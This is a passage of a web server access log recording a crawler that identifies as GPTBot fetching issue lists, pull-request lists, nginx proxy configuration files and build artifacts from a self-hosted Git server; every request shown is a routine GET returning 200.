Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:21:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=PostgresWatchdog%2fPostgresWatchdog.exe" [Client 74.7.227.38] [Length 23787] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/PostgresWatchdog.exe" +[17/Feb/2026:19:21:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/4.conf?display=source" [Client 74.7.227.38] [Length 13013] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/4.conf" +[17/Feb/2026:19:21:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/3.conf?display=source" [Client 74.7.227.38] [Length 14086] [Gzip 4.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:19:21:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/1.conf?display=source" [Client 74.7.227.38] [Length 13227] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/1.conf" +[17/Feb/2026:19:21:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/2.conf?display=source" [Client 74.7.227.38] [Length 13005] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/2.conf" +[17/Feb/2026:19:21:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:21:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9957] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:21:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:21:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=nearduedate&state=closed&type=all" +[17/Feb/2026:19:21:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=nearduedate&state=closed&type=all" +[17/Feb/2026:19:21:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:21:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:21:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:21:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 21410] [Gzip 10.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" +[17/Feb/2026:19:21:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 13915] [Gzip 4.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" +[17/Feb/2026:19:21:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 15021] [Gzip 5.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" +[17/Feb/2026:19:21:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10071] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:21:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10247] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:21:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:21:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?state=open&type=all" [Client 74.7.227.38] [Length 10096] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues" +[17/Feb/2026:19:21:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=closed&type=all" +[17/Feb/2026:19:22:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:19:22:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10237] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:22:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:22:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:22:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10238] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:22:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:22:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:22:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:19:22:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=leastupdate&state=closed&type=all" +[17/Feb/2026:19:22:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:22:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:22:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:22:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:22:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:22:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:22:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=open&type=all" +[17/Feb/2026:19:22:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&sort=leastupdate&state=open&type=all" +[17/Feb/2026:19:22:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:22:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:22:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:22:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:22:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:22:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:22:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:22:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:22:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:22:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:22:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:22:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10238] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:22:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:22:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:22:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:22:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:22:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:22:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:22:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10083] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:22:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr 